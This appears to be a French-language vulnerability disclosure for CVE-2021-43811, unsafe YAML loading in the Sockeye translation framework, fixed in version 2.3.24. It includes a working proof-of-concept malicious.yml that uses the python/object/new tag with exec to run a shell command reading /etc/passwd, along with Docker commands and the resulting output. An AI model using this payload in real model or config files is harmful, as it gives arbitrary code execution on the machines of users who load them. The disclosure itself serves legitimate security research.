
awslabs/sockeye Injection de code via un chargement YAML non sécurisé CVE-2021-43811
awslabs/sockeye — Injection de code via chargement YAML non sécurisé CVE-2021-43811
Sockeye est un framework open-source de séquence à séquence pour la traduction automatique neuronale construit sur PyTorch. Sockeye utilise YAML pour stocker les configurations de modèles et de données sur le disque. Les versions antérieures à 2.3.24 utilisent un chargement YAML non sécurisé, qui peut être amené à exécuter du code arbitraire intégré dans les fichiers de configuration. Un attaquant peut ajouter du code malveillant au fichier de configuration d'un modèle entraîné et tenter de convaincre les utilisateurs de le télécharger et de l'exécuter. Si les utilisateurs exécutent le modèle, le code intégré s'exécutera localement. Le problème est corrigé dans la version 2.3.24.

docker build -t cve-2021-43811 .
docker run -it --rm cve-2021-43811
Sortie /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"